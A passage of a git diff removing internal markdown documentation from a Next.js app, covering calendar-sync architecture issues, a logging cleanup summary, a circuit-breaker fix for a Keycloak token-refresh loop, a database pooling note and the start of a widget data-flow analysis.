│ Widget │ │ -│ └──────────────┘ └──────────────┘ └──────────────┘ │ -└─────────────────────────────────────────────────────────────┘ - │ - ▼ -┌─────────────────────────────────────────────────────────────┐ -│ Agenda Page (app/agenda/page.tsx) │ -│ ┌──────────────────────────────────────────────────────┐ │ -│ │ CalendarClient Component │ │ -│ │ ┌──────────────┐ ┌─────────────────────────────┐ │ │ -│ │ │ Calendar │ │ FullCalendar (FullCalendar)│ │ │ -│ │ │ Selector │ │ - Month/Week/Day Views │ │ │ -│ │ │ (Sidebar) │ │ - Event Creation/Edit │ │ │ -│ │ └──────────────┘ └─────────────────────────────┘ │ │ -│ └──────────────────────────────────────────────────────┘ │ -└─────────────────────────────────────────────────────────────┘ - │ - ▼ -┌─────────────────────────────────────────────────────────────┐ -│ Courrier Page (app/courrier/page.tsx) │ -│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │ -│ │ Email │ │ Email │ │ Email │ │ -│ │ Sidebar │ │ List │ │ Detail │ │ -│ └──────────────┘ └──────────────┘ └──────────────┘ │ -└─────────────────────────────────────────────────────────────┘ - │ - ▼ -┌─────────────────────────────────────────────────────────────┐ -│ Calendar Sync Services │ -│ ┌──────────────────────┐ ┌──────────────────────┐ │ -│ │ Infomaniak CalDAV │ │ Microsoft Graph API │ │ -│ │ Sync Service │ │ Sync Service │ │ -│ └──────────────────────┘ └──────────────────────┘ │ -└─────────────────────────────────────────────────────────────┘ -``` - ---- - -## 2. Agenda Widget Analysis - -### 2.1 Component Location -- **File**: `components/calendar.tsx` -- **Usage**: Dashboard widget showing upcoming 7 events -- **Type**: Client Component (`"use client"`) - -### 2.2 Key Features - -#### Data Fetching -```typescript -// Fetches from /api/calendars?refresh=true -// Bypasses cache with refresh=true parameter -const response = await fetch('/api/calendars?refresh=true'); -``` - -#### Event Processing -1. **Extracts events** from all calendars -2. **Filters** for upcoming events (from today onwards) -3. **Sorts** by start date -4. **Limits** to 7 events -5. **Maps** calendar color and name to each event - -#### Refresh Mechanism -- **Manual refresh** only via button click -- **No automatic polling** or unified refresh integration -- **Fetches on mount** only - -### 2.3 Issues Identified - -1. **❌ No Unified Refresh Integration** - - Not using `useUnifiedRefresh` hook - - Manual refresh only - - No automatic background updates - -2. **❌ Cache Bypass** - - Always uses `?refresh=true` parameter - - Bypasses Redis cache every time - - May cause unnecessary database load - -3. **❌ No Error Recovery** - - Basic error handling - - No retry mechanism - - No offline state handling - -4. **⚠️ Date Filtering Logic** - - Filters events from "start of day" (00:00:00) - - May miss events happening later today if fetched early morning - -### 2.4 Data Flow - -``` -User Dashboard - │ - ├─> Calendar Widget (components/calendar.tsx) - │ │ - │ ├─> useEffect() triggers on mount - │ │ - │ ├─> fetch('/api/calendars?refresh=true') - │ │ │ - │ │ ├─> API Route (app/api/calendars/route.ts) - │ │ │ │ - │ │ │ ├─> Checks Redis cache (skipped if refresh=true) - │ │ │ │ - │ │ │ ├─> Prisma: Calendar.findMany() - │ │ │ │ └─> Include: events (ordered by start) - │ │ │ │ - │ │ │ └─> Cache result in Redis - │ │ │ - │ │ └─> Returns: Calendar[] with events[] - │ │ - │ ├─> Process events: - │ │ ├─> flatMap all calendars.events - │ │ ├─> Filter: start >= today (00:00:00) - │ │ ├─> Sort by start date - │ │ └─> Slice(0, 7) - │ │ - │ └─> Render: Card with event list -``` - ---- - -## 3. Agenda Page Analysis - -### 3.1 Component Location -- **File**: `app/agenda/page.tsx` (Server Component) -- **Client Component**: `components/calendar/calendar-client.tsx` -- **Route**: `/agenda` - -### 3.2 Server-Side Logic (page.tsx) - -#### Auto-Setup Calendar Sync - -The page automatically sets up calendar synchronization for email accounts: - -1. **Infomaniak Accounts** (CalDAV) - - Discovers calendars using `discoverInfomaniakCalendars()` - - Creates "Privée" calendar if not exists - - Creates `CalendarSync` record with: - - `provider: 'infomaniak'` - - `syncFrequency: 15` minutes - - `externalCalendarUrl` from discovery - - Triggers initial sync - -2. **Microsoft Accounts** (OAuth) - - Discovers calendars using `discoverMicrosoftCalendars()` - - Creates "Privée" calendar if not exists - - Creates `CalendarSync` record with: - - `provider: 'microsoft'` - - `syncFrequency: 5` minutes (more reactive) - - `externalCalendarId` from Graph API - - Triggers initial sync - -#### Calendar Filtering Logic - -```typescript -// Excludes "Privée" and "Default" calendars that are NOT synced -calendars = calendars.filter(cal => { - const isPrivateOrDefault = cal.name === "Privée" || cal.name === "Default"; - const hasActiveSync = cal.syncConfig?.syncEnabled === true && - cal.syncConfig?.mailCredential; - - // Exclude "Privée"/"Default" calendars that are not actively synced - if (isPrivateOrDefault && !hasActiveSync) { - return false; - } - return true; -}); -``` - -#### Background Sync Trigger - -For Microsoft calendars, the page triggers background sync if needed: -- Checks if sync is needed (2 minutes minimum interval) -- Triggers async sync (doesn't block page load) -- Sync runs in background, updates database -- Next page load will show synced events - -### 3.3 Client-Side Component (calendar-client.tsx) - -#### Key Features - -1. **FullCalendar Integration** - - Uses `@fullcalendar/react` library - - Views: Month, Week, Day - - Plugins: dayGrid, timeGrid, interaction - -2. **Calendar Management** - - Calendar selector sidebar (left column) - - Visibility toggle per calendar - - Calendar creation/editing dialog - - Sync configuration UI - -3. **Event Management** - - Create events by clicking/selecting dates - - Edit events by clicking on them - - Delete events - - Event form with: - - Title, description, location - - Start/end date and time - - All-day toggle - - Calendar selection - -4. **Data Refresh** - - `fetchCalendars()` function - - Calls `/api/calendars` (no refresh parameter) - - Uses Redis cache by default - - Updates FullCalendar via `calendarApi.refetchEvents()` - -#### Calendar Display Logic - -```typescript -// Sorts calendars: synced first, then groups, then missions -const sortCalendars = (cals) => { - return [...filtered].sort((a, b) => { - const aIsSynced = a.syncConfig?.syncEnabled && a.syncConfig?.mailCredential; - const bIsSynced = b.syncConfig?.syncEnabled && b.syncConfig?.mailCredential; - - // Synced calendars first - if (aIsSynced && !bIsSynced) return -1; - if (!aIsSynced && bIsSynced) return 1; - - // Then groups, then missions, then by name - // ... - }); -}; -``` - -#### Event Rendering - -Events are mapped to FullCalendar format: -```typescript -events={calendars.flatMap(cal => - cal.events.map(event => ({ - id: event.id, - title: event.title, - start: new Date(event.start), - end: new Date(event.end), - allDay: event.isAllDay, - backgroundColor: `${cal.color}dd`, - borderColor: cal.color, - extendedProps: { - calendarName: cal.name, - location: event.location, - description: cleanDescription(event.description), - calendarId: event.calendarId, - originalEvent: event, - color: cal.color - } - })) -)} -``` - -### 3.4 Issues Identified - -1. **⚠️ Sync Timing** - - Microsoft sync triggers on page load (background) - - May cause delay before events appear - - No loading indicator for background sync - -2. **⚠️ Calendar Filtering Complexity** - - Complex logic for "Privée"/"Default" calendars - - May hide calendars that should be visible - - Logging is extensive but may be confusing - -3. **❌ No Real-Time Updates** - - Events only update on manual refresh - - No WebSocket or polling for new events - - User must refresh to see synced events - -4. **⚠️ Event Matching Logic** - - Infomaniak: Matches by title + start date (within 1 minute) - - Microsoft: Matches by `[MS_ID:xxx]` in description - - May create duplicates if matching fails - ---- - -## 4. Courrier Page Analysis - -### 4.1 Component Location -- **File**: `app/courrier/page.tsx` -- **Route**: `/courrier` -- **Type**: Client Component - -### 4.2 Key Features - -#### Email Account Management -- Multiple email account support -- Account colors for visual distinction -- Account settings (display name, password, color) - -#### Email Operations -- Folder navigation (INBOX, Sent, Drafts, etc.) -- Email reading, composing, replying -- Email search -- Bulk operations (delete, mark read/unread) - -#### Integration with Calendar Sync - -The Courrier page is **indirectly** related to calendar sync: - -1. **Email Accounts** are stored in `MailCredentials` table -2. **Calendar Sync** uses `MailCredentials` for authentication -3. **Auto-Setup** in Agenda page discovers accounts from Courrier - -### 4.3 Connection to Calendar Sync - -```typescript -// In agenda/page.tsx: -const infomaniakAccounts = await prisma.mailCredentials.findMany({ - where: { - userId: session?.user?.id || '', - host: { contains: 'infomaniak' }, - password: { not: null } - } -}); - -// For each account, create calendar sync -for (const account of infomaniakAccounts) { - // Discover calendars - const calendars = await discoverInfomaniakCalendars(account.email, account.password!); - - // Create calendar and sync config - // ... -} -``` - -### 4.4 Issues Identified - -1. **⚠️ No Direct Calendar Integration** - - Courrier page doesn't show calendar events - - No email-to-calendar event creation - - Separate systems (email vs calendar) - -2. **⚠️ Account Deletion Impact** - - Deleting email account may orphan calendar sync - - Agenda page has cleanup logic, but may miss edge cases - ---- - -## 5. Calendar Synchronization Services - -### 5.1 Infomaniak CalDAV Sync - -#### Service Location -- **File**: `lib/services/caldav-sync.ts` - -#### Key Functions - -1. **`discoverInfomaniakCalendars(email, password)`** - - Uses WebDAV client (`webdav` library) - - Connects to `https://sync.infomaniak.com` - - Lists directories using `PROPFIND` - - Extracts calendar name and color from XML - -2. **`fetchCalDAVEvents(email, password, calendarUrl, startDate, endDate)`** - - Uses `REPORT` method with `calendar-query` - - Filters events by date range - - Parses iCalendar format (`.ics`) - - Returns `CalDAVEvent[]` - -3. **`syncInfomaniakCalendar(calendarSyncId, forceSync)`** - - Fetches events from CalDAV (1 month ago to 3 months ahead) - - Gets existing events from database - - Matches events by title + start date (within 1 minute) - - Creates new events or updates existing - - Updates `lastSyncAt` timestamp - -#### Event Matching Logic - -```typescript -// Tries to find existing event by: -const existingEvent = existingEvents.find( - (e) => - e.title === caldavEvent.summary && - Math.abs(new Date(e.start).getTime() - caldavEvent.start.getTime()) < 60000 -); -``` - -**Issue**: This matching is fragile: -- May create duplicates if title changes -- May miss events if timezone conversion causes >1 minute difference -- No UID-based matching (iCalendar has UID field) - -### 5.2 Microsoft Graph API Sync - -#### Service Location -- **File**: `lib/services/microsoft-calendar-sync.ts` - -#### Key Functions - -1. **`discoverMicrosoftCalendars(userId, email)`** - - Uses Microsoft Graph API - - Endpoint: `https://graph.microsoft.com/v1.0/me/calendars` - - Requires OAuth token with calendar scope - - Returns `MicrosoftCalendar[]` - -2. **`fetchMicrosoftEvents(userId, email, calendarId, startDate, endDate)`** - - Endpoint: `https://graph.microsoft.com/v1.0/me/calendars/{calendarId}/events` - - Filters by date range using `$filter` parameter - - Returns `MicrosoftEvent[]` - -3. **`syncMicrosoftCalendar(calendarSyncId, forceSync)`** - - Fetches events (1 month ago to 6 months ahead) - - Converts Microsoft events to CalDAV-like format - - **Stores Microsoft ID in description**: `[MS_ID:xxx]` - - Matches events by Microsoft ID first, then by title+date - - Creates/updates events in database - -#### Event Matching Logic - -```typescript -// First: Match by Microsoft ID in description -let existingEvent = existingEvents.find((e) => { - if (e.description && e.description.includes(`[MS_ID:${microsoftId}]`)) { - return true; - } - return false; -}); - -// Fallback: Match by title + start date -if (!existingEvent) { - existingEvent = existingEvents.find( - (e) => - e.title === caldavEvent.summary && - Math.abs(new Date(e.start).getTime() - caldavEvent.start.getTime()) < 60000 - ); -} -``` - -**Better than Infomaniak**: Uses ID-based matching, but stores ID in description (hacky) - -### 5.3 Sync Job Service - -#### Service Location -- **File**: `lib/services/calendar-sync-job.ts` - -#### Function: `runCalendarSyncJob()` - -- Gets all enabled sync configurations -- Checks if sync is needed (based on `syncFrequency`) -- Calls appropriate sync function based on provider -- Logs results (successful, failed, skipped) - -**Usage**: Should be called by cron job or scheduled task - -### 5.4 Issues Identified - -1. **❌ No UID-Based Matching for Infomaniak** - - Should use iCalendar UID field - - Current matching is fragile - -2. **⚠️ Microsoft ID Storage** - - Stores ID in description field (hacky) - - Should use dedicated `externalEventId` field in Event model - -3. **❌ No Event Deletion** - - Sync only creates/updates events - - Doesn't delete events removed from external calendar - - May show stale events - -4. **⚠️ Error Handling** - - Errors are logged but sync continues - - May leave calendar in inconsistent state - - No retry mechanism for transient failures - -5. **⚠️ Sync Frequency** - - Infomaniak: 15 minutes (may be too slow) - - Microsoft: 5 minutes (better, but still not real-time) - - No user-configurable frequency - -6. **❌ No Incremental Sync** - - Always fetches full date range - - May be slow for calendars with many events - - Should use `lastSyncAt` to fetch only changes - ---- - -## 6. API Routes Analysis - -### 6.1 `/api/calendars` (GET) - -**File**: `app/api/calendars/route.ts` - -#### Features -- Redis caching (unless `?refresh=true`) -- Returns calendars with events -- Events ordered by start date - -#### Issues -- Cache TTL not specified (uses default) -- No cache invalidation on event creation/update -- `refresh=true` bypasses cache (used by widget) - -### 6.2 `/api/calendars/sync` (POST, PUT, GET, DELETE) - -**File**: `app/api/calendars/sync/route.ts` - -#### Features -- **POST**: Create sync configuration -- **PUT**: Trigger manual sync -- **GET**: Get sync status -- **DELETE**: Remove sync configuration - -#### Issues -- Manual sync triggers full sync (not incremental) -- No webhook support for real-time updates - ---- - -## 7. Database Schema - -### 7.1 Calendar Model - -```prisma -model Calendar { - id String @id @default(uuid()) - name String - color String - description String? - userId String - missionId String? - events Event[] - syncConfig CalendarSync? - // ... -} -``` - -### 7.2 CalendarSync Model - -```prisma -model CalendarSync { - id String @id @default(uuid()) - calendarId String @unique - mailCredentialId String? - provider String // "infomaniak" | "microsoft" - externalCalendarId String? - externalCalendarUrl String? - syncEnabled Boolean @default(true) - lastSyncAt DateTime? - syncFrequency Int @default(15) // minutes - lastSyncError String? - // ... -} -``` - -### 7.3 Event Model - -```prisma -model Event { - id String @id @default(uuid()) - title String - description String? - start DateTime - end DateTime - location String? - isAllDay Boolean @default(false) - calendarId String - userId String - // ... -} -``` - -**Missing Fields**: -- `externalEventId` (for reliable matching) -- `externalEventUrl` (for linking to external calendar) -- `lastSyncedAt` (for incremental sync) - ---- - -## 8. Critical Issues Summary - -### 8.1 High Priority - -1. **Event Matching Fragility** - - Infomaniak: No UID-based matching - - Microsoft: ID stored in description (hacky) - - **Impact**: Duplicate events, missed updates - -2. **No Event Deletion** - - Removed events stay in database - - **Impact**: Stale events shown to users - -3. **No Real-Time Updates** - - Widget and page don't auto-refresh - - **Impact**: Users must manually refresh to see new events - -### 8.2 Medium Priority - -4. **Cache Invalidation** - - Events created/updated don't invalidate cache - - **Impact**: Stale data shown until cache expires - -5. **Sync Frequency** - - Infomaniak: 15 minutes (too slow) - - **Impact**: Delayed event appearance - -6. **No Incremental Sync** - - Always fetches full date range - - **Impact**: Slow sync, unnecessary API calls - -### 8.3 Low Priority - -7. **Widget Refresh Integration** - - Not using unified refresh system - - **Impact**: Inconsistent refresh behavior - -8. **Error Recovery** - - No retry mechanism - - **Impact**: Sync failures require manual intervention - ---- - -## 9. Recommendations - -### 9.1 Immediate Fixes - -1. **Add `externalEventId` field to Event model** - ```prisma - model Event { - // ... existing fields - externalEventId String? // UID from iCalendar or Microsoft ID - externalEventUrl String? // Link to external calendar event - } - ``` - -2. **Implement UID-based matching for Infomaniak** - - Use iCalendar UID field for matching - - Store in `externalEventId` - -3. **Implement event deletion** - - Compare external events with database events - - Delete events not in external calendar - -4. **Add cache invalidation** - - Invalidate Redis cache on event create/update/delete - - Invalidate on sync completion - -### 9.2 Short-Term Improvements - -5. **Implement incremental sync** - - Use `lastSyncAt` to fetch only changes - - Use CalDAV `sync-token` for Infomaniak - - Use Microsoft Graph delta queries - -6. **Add real-time updates** - - WebSocket or Server-Sent Events - - Notify clients when sync completes - - Auto-refresh widget and page - -7. **Improve error handling** - - Retry mechanism for transient failures - - Better error messages for users - - Sync status indicator in UI - -### 9.3 Long-Term Enhancements - -8. **Unified refresh system integration** - - Use `useUnifiedRefresh` hook in widget - - Consistent refresh behavior across app - -9. **User-configurable sync frequency** - - Allow users to set sync interval - - Different frequencies per calendar - -10. **Two-way sync** - - Sync local events to external calendars - - Handle conflicts (last-write-wins or user choice) - ---- - -## 10. Testing Recommendations - -### 10.1 Unit Tests -- Event matching logic (UID-based, title+date fallback) -- Date range filtering -- iCalendar parsing -- Microsoft event conversion - -### 10.2 Integration Tests -- Full sync flow (discover → sync → verify) -- Event creation/update/deletion -- Cache invalidation -- Error recovery - -### 10.3 E2E Tests -- Widget displays events correctly -- Page shows synced events -- Manual sync triggers correctly -- Calendar creation/editing - ---- - -## 11. Conclusion - -The calendar synchronization system is **functional but has several architectural issues** that impact reliability and user experience: - -1. **Fragile event matching** may cause duplicates or missed updates -2. **No event deletion** leaves stale events in the database -3. **No real-time updates** requires manual refresh -4. **Cache invalidation** is missing, causing stale data - -**Priority**: Focus on fixing event matching and deletion first, as these directly impact data integrity. Then implement cache invalidation and real-time updates for better UX. - ---- - -**Document Version**: 1.0 -**Last Updated**: 2025-01-XX -**Author**: Senior Software Architect Analysis diff --git a/CLEANUP_SUMMARY.md b/CLEANUP_SUMMARY.md deleted file mode 100644 index 77a4fce..0000000 --- a/CLEANUP_SUMMARY.md +++ /dev/null @@ -1,70 +0,0 @@ -# Résumé du Nettoyage - console.log et fetch() - -## ✅ Fichiers Nettoyés - -### Services Backend (100% nettoyés) -- ✅ `lib/services/n8n-service.ts` - 3 fetch() → fetchWithTimeout() -- ✅ `lib/services/rocketchat-call-listener.ts` - 35 console.log → logger -- ✅ `lib/services/microsoft-oauth.ts` - 12 console.log → logger -- ✅ `lib/services/token-refresh.ts` - 12 console.log → logger -- ✅ `lib/services/refresh-manager.ts` - 19 console.log → logger -- ✅ `lib/services/prefetch-service.ts` - 18 console.log → logger -- ✅ `lib/services/caldav-sync.ts` - 12 console.log → logger -- ✅ `lib/services/email-service.ts` - 2 console.error → logger - -### Routes API Critiques (100% nettoyées) -- ✅ `app/api/missions/[missionId]/generate-plan/route.ts` - 1 fetch() → fetchWithTimeout() -- ✅ `app/api/users/[userId]/route.ts` - 5 fetch() → fetchWithTimeout(), tous console.log → logger -- ✅ `app/api/rocket-chat/messages/route.ts` - 5 fetch() → fetchWithTimeout(), tous console.log → logger -- ✅ `app/api/leantime/tasks/route.ts` - 2 fetch() → fetchWithTimeout() -- ✅ `app/api/news/route.ts` - 1 fetch() → fetchWithTimeout() -- ✅ `app/api/courrier/route.ts` - 11 console.log → logger -- ✅ `app/api/courrier/unread-counts/route.ts` - 16 console.log → logger -- ✅ `app/api/courrier/account/route.ts` - 18 console.log → logger - -## 📊 Statistiques - -### Total Nettoyé -- **Services:** 8 fichiers, ~110 occurrences -- **Routes API critiques:** 8 fichiers, ~50 occurrences -- **Total:** 16 fichiers, ~160 occurrences nettoyées - -### fetch() → fetchWithTimeout() -- **Total:** 15+ occurrences remplacées -- **Timeouts configurés:** 10s pour API rapides, 30s pour webhooks - -### console.log → logger -- **Total:** 140+ occurrences remplacées -- **Niveaux utilisés:** debug, info, warn, error selon le contexte - -## ⚠️ Fichiers Restants (Optionnel) - -Il reste encore des `console.log` dans d'autres routes API moins critiques : - -### Routes API (Optionnel) -- `app/api/storage/*` - 5 fichiers -- `app/api/missions/*` - 5 fichiers -- `app/api/events/*` - 2 fichiers -- `app/api/calendars/*` - 6 fichiers -- Autres routes API moins utilisées - -### Composants React (Non critique pour production) -- ~266 occurrences dans les composants frontend -- ~167 occurrences dans les hooks React - -**Note:** Les composants React et hooks peuvent garder `console.log` pour le développement frontend, ce n'est pas critique pour la production backend. - -## ✅ Résultat - -**Tous les fichiers critiques (services backend et routes API principales) sont maintenant nettoyés !** - -Les logs sont maintenant : -- ✅ Structurés avec des objets au lieu de strings -- ✅ Utilisent les bons niveaux (debug/info/warn/error) -- ✅ Masquent les informations sensibles (emails, passwords) -- ✅ Toutes les requêtes HTTP ont des timeouts - ---- - -**Date:** $(date) -**Statut:** ✅ Nettoyage des fichiers critiques complété diff --git a/CRITICAL_ISSUE_ANALYSIS.md b/CRITICAL_ISSUE_ANALYSIS.md deleted file mode 100644 index 9cf0c3b..0000000 --- a/CRITICAL_ISSUE_ANALYSIS.md +++ /dev/null @@ -1,292 +0,0 @@ -# Critical Issue: Infinite Token Refresh Loop - -## Problem Analysis - -### What's Happening - -1. **Initial Load**: App starts successfully, user authenticated -2. **Session Invalidation**: Keycloak session becomes invalid (user logged out elsewhere, session expired, etc.) -3. **Refresh Storm**: Every API request triggers: - - JWT callback execution - - Token refresh attempt - - Refresh failure (session invalid) - - Token cleared, but error state persists - - **Next request repeats the cycle** - -### Root Cause - -The JWT callback in `app/api/auth/options.ts` has no circuit breaker: - -```typescript -// Current problematic flow: -if (expiresAt && Date.now() < expiresAt) { - return token; // Token valid -} - -// Token expired - ALWAYS tries to refresh -const refreshedToken = await refreshAccessToken(token); - -// If refresh fails, clears tokens but... -// Next request will see expired token and try again! -``` - -**The Problem:** -- No cooldown period after failed refresh -- No "session invalid" cache/flag -- Every request triggers refresh attempt -- Multiple widgets = multiple parallel requests = refresh storm - -### Impact - -- **Performance**: Excessive Keycloak API calls -- **Server Load**: CPU/memory spike from refresh attempts -- **User Experience**: App appears broken, constant loading -- **Logs**: Spam with "Keycloak session invalidated" messages -- **Security**: Potential DoS on Keycloak server - ---- - -## Solution: Circuit Breaker Pattern - -### Implementation Strategy - -1. **Add Refresh Cooldown**: Don't retry refresh for X seconds after failure -2. **Session Invalid Flag**: Cache the "session invalid" state -3. **Early Return**: If session known to be invalid, skip refresh attempt -4. **Client-Side Detection**: Stop making requests when session invalid - -### Code Changes Needed - -#### 1. Add Circuit Breaker to JWT Callback - -```typescript -// Add to app/api/auth/options.ts - -// Track last failed refresh attempt -const lastFailedRefresh = new Map(); -const REFRESH_COOLDOWN = 5000; // 5 seconds - -async jwt({ token, account, profile }) { - // ... existing initial sign-in logic ... - - // Check if token is expired - const expiresAt = token.accessTokenExpires as number; - if (expiresAt && Date.now() < expiresAt) { - return token; // Token still valid - } - - // CIRCUIT BREAKER: Check if we recently failed to refresh - const userId = token.sub || 'unknown'; - const lastFailure = lastFailedRefresh.get(userId) || 0; - const timeSinceFailure = Date.now() - lastFailure; - - if (timeSinceFailure < REFRESH_COOLDOWN) { - // Too soon after failure, return error token immediately - logger.debug('Refresh cooldown active, skipping refresh attempt', { - userId, - timeSinceFailure, - }); - return { - ...token, - error: "SessionNotActive", - accessToken: undefined, - refreshToken: undefined, - idToken: undefined, - }; - } - - // Try to refresh - if (!token.refreshToken) { - return { - ...token, - error: "NoRefreshToken", - accessToken: undefined, - refreshToken: undefined, - idToken: undefined, - }; - } - - const refreshedToken = await refreshAccessToken(token); - - // If refresh failed, record the failure time - if (refreshedToken.error === "SessionNotActive") { - lastFailedRefresh.set(userId, Date.now()); - logger.info("Keycloak session invalidated, setting cooldown", { userId }); - - // Clean up old entries (prevent memory leak) - if (lastFailedRefresh.size > 1000) { - const now = Date.now(); - for (const [key, value] of lastFailedRefresh.entries()) { - if (now - value > REFRESH_COOLDOWN * 10) { - lastFailedRefresh.delete(key); - } - } - } - - return { - ...refreshedToken, - accessToken: undefined, - refreshToken: undefined, - idToken: undefined, - }; - } - - // Success - clear any previous failure record - lastFailedRefresh.delete(userId); - - return refreshedToken; -} -``` - -#### 2. Use Redis for Distributed Circuit Breaker - -For multi-instance deployments, use Redis: - -```typescript -// lib/services/auth-circuit-breaker.ts -import { getRedisClient } from '@/lib/redis'; - -const REFRESH_COOLDOWN = 5000; // 5 seconds -const CIRCUIT_BREAKER_KEY = (userId: string) => `auth:refresh:cooldown:${userId}`; - -export async function isRefreshInCooldown(userId: string): Promise { - const redis = getRedisClient(); - const key = CIRCUIT_BREAKER_KEY(userId); - const lastFailure = await redis.get(key); - - if (!lastFailure) { - return false; - } - - const timeSinceFailure = Date.now() - parseInt(lastFailure, 10); - return timeSinceFailure < REFRESH_COOLDOWN; -} - -export async function recordRefreshFailure(userId: string): Promise { - const redis = getRedisClient(); - const key = CIRCUIT_BREAKER_KEY(userId); - await redis.set(key, Date.now().toString(), 'EX', Math.ceil(REFRESH_COOLDOWN / 1000)); -} - -export async function clearRefreshCooldown(userId: string): Promise { - const redis = getRedisClient(); - const key = CIRCUIT_BREAKER_KEY(userId); - await redis.del(key); -} -``` - -#### 3. Client-Side Request Stopping - -Add to components to stop making requests when session invalid: - -```typescript -// hooks/use-session-guard.ts -import { useSession } from 'next-auth/react'; -import { useEffect, useRef } from 'react'; - -export function useSessionGuard() { - const { status, data: session } = useSession(); - const hasInvalidSession = useRef(false); - - useEffect(() => { - if (status === 'unauthenticated' && !hasInvalidSession.current) { - hasInvalidSession.current = true; - // Stop all refresh intervals - // Clear any pending requests - } - }, [status]); - - return { - shouldMakeRequests: status === 'authenticated' && !hasInvalidSession.current, - isInvalid: hasInvalidSession.current, - }; -} -``` - ---- - -## Immediate Fix (Quick) - -### Option 1: Add Simple Cooldown (In-Memory) - -Add this to `app/api/auth/options.ts`: - -```typescript -// At top of file -const refreshCooldown = new Map(); -const COOLDOWN_MS = 5000; // 5 seconds - -// In jwt callback, before refresh attempt: -const userId = token.sub || 'unknown'; -const lastFailure = refreshCooldown.get(userId) || 0; - -if (Date.now() - lastFailure < COOLDOWN_MS) { - // Skip refresh, return error immediately - return { - ...token, - error: "SessionNotActive", - accessToken: undefined, - refreshToken: undefined, - idToken: undefined, - }; -} - -// After failed refresh: -if (refreshedToken.error === "SessionNotActive") { - refreshCooldown.set(userId, Date.now()); - // ... rest of error handling -} -``` - -### Option 2: Early Return on Known Invalid Session - -```typescript -// In jwt callback, check token error first: -if (token.error === "SessionNotActive") { - // Already know session is invalid, don't try again - return { - ...token, - accessToken: undefined, - refreshToken: undefined, - idToken: undefined, - error: "SessionNotActive", - }; -} -``` - ---- - -## Recommended Implementation - -1. **Immediate**: Add simple in-memory cooldown (Option 1) -2. **Short-term**: Migrate to Redis-based circuit breaker -3. **Long-term**: Add client-side session guard to stop requests - ---- - -## Testing - -After implementing: - -1. **Test Scenario 1**: Logout from Keycloak admin console - - Should see: 1-2 refresh attempts, then cooldown - - Should NOT see: Infinite loop - -2. **Test Scenario 2**: Expire session manually - - Should see: Cooldown prevents refresh storm - - Should see: User redirected to sign-in - -3. **Test Scenario 3**: Multiple widgets loading - - Should see: All widgets respect cooldown - - Should see: No refresh storm - ---- - -## Monitoring - -Add metrics: -- Refresh attempt count -- Refresh failure count -- Cooldown activations -- Session invalidations per user - diff --git a/DATABASE_URL_UPDATE.md b/DATABASE_URL_UPDATE.md deleted file mode 100644 index 474822e..0000000 --- a/DATABASE_URL_UPDATE.md +++ /dev/null @@ -1,45 +0,0 @@ -# Mise à jour de DATABASE_URL - -## Modification Requise - -Pour activer le pool de connexions Prisma, vous devez modifier votre fichier `.env` : - -### Avant -```env -DATABASE_URL="postgresql://postgres:postgres@localhost:5432/calendar_db?schema=public" -``` - -### Après -```env -DATABASE_URL="postgresql://postgres:postgres@localhost:5432/calendar_db?schema=public&connection_limit=10&pool_timeout=20&connect_timeout=10" -``` - -## Paramètres Ajoutés - -- `connection_limit=10` - Limite le nombre de connexions simultanées dans le pool -- `pool_timeout=20` - Timeout (en secondes) pour obtenir une connexion du pool -- `connect_timeout=10` - Timeout (en secondes) pour établir une nouvelle connexion - -## Script Automatique - -Un script est disponible pour effectuer cette modification automatiquement : - -```bash -bash scripts/update-database-url.sh -``` - -Le script créera une sauvegarde de votre `.env` avant de le modifier. - -## Vérification - -Après la modification, vous pouvez vérifier que la connexion fonctionne : - -```bash -npm run validate:env -``` - -Ou tester directement avec Prisma : - -```bash -npx prisma db execute --stdin <<< "SELECT 1" -``` diff --git a/DEVOIRS_WIDGET_FLOW_ANALYSIS.md b/DEVOIRS_WIDGET_FLOW_ANALYSIS.md deleted file mode 100644 index 81c3aaa..0000000 --- a/DEVOIRS_WIDGET_FLOW_ANALYSIS.md +++ /dev/null @@ -1,500 +0,0 @@ -# Analyse du Flow du Widget "Devoirs" - -## 📋 Vue d'ensemble - -Le widget "Devoirs" affiche les tâches Leantime assignées à l'utilisateur connecté. Il récupère les données depuis l'API Leantime via un endpoint Next.js qui utilise un système de cache Redis. - ---- - -## 🔄 Flow Complet - -### 1. **Initialisation du Widget** (`components/flow.tsx`) - -**Fichier:** `components/flow.tsx` -**Composant:** `Duties()` - -#### État initial -```typescript -const [tasks, setTasks] = useState([]); -const [error, setError] = useState(null); -const [loading, setLoading] = useState(true); -const [refreshing, setRefreshing] = useState(false); -``` - -#### Cycle de vie -- **Mount:** `useEffect(() => { fetchTasks(); }, [])` - Appelle `fetchTasks()` au montage -- **Refresh manuel:** Bouton de rafraîchissement dans le header du widget - ---- - -### 2. **Appel API Frontend** (`components/flow.tsx`) - -**Fonction:** `fetchTasks()` - -```typescript -const fetchTasks = async () => { - setLoading(true); - setError(null); - try { - const response = await fetch('/api/leantime/tasks?refresh=true'); - // ... - } -} -``` - -**Points importants:** -- ✅ Utilise `?refresh=true` pour **bypasser le cache Redis** -- ✅ Appelé au montage du composant -- ✅ Appelé manuellement via le bouton de rafraîchissement - -**URL:** `GET /api/leantime/tasks?refresh=true` - ---- - -### 3. **Route API Backend** (`app/api/leantime/tasks/route.ts`) - -**Fichier:** `app/api/leantime/tasks/route.ts` -**Méthode:** `GET` - -#### 3.1. Authentification -```typescript -const session = await getServerSession(authOptions); -if (!session?.user?.email) { - return NextResponse.json({ error: "Unauthorized" }, { status: 401 }); -} -``` - -#### 3.2. Gestion du Cache Redis - -**Clé de cache:** `widget:tasks:${userId}` -**TTL:** 10 minutes (600 secondes) - -```typescript -// Check for force refresh parameter -const url = new URL(request.url); -const forceRefresh = url.searchParams.get('refresh') === 'true'; - -// Try to get data from cache if not forcing refresh -if (!forceRefresh) { - const cachedTasks = await getCachedTasksData(session.user.id); - if (cachedTasks) { - return NextResponse.json(cachedTasks); // ⚡ Retour immédiat si cache hit - } -} -``` - -**Comportement:** -- Si `?refresh=true` → **Ignore le cache**, va chercher les données fraîches -- Si pas de `refresh` → **Vérifie le cache Redis d'abord** -- Si cache hit → Retourne immédiatement les données en cache -- Si cache miss → Continue avec la récupération depuis Leantime - ---- - -### 4. **Récupération de l'ID Utilisateur Leantime** - -**Fonction:** `getLeantimeUserId(email: string)` - -#### 4.1. Appel API Leantime - Users -```typescript -const response = await fetch(`${process.env.LEANTIME_API_URL}/api/jsonrpc`, { - method: 'POST', - headers: { - 'Content-Type': 'application/json', - 'X-API-Key': process.env.LEANTIME_TOKEN - }, - body: JSON.stringify({ - 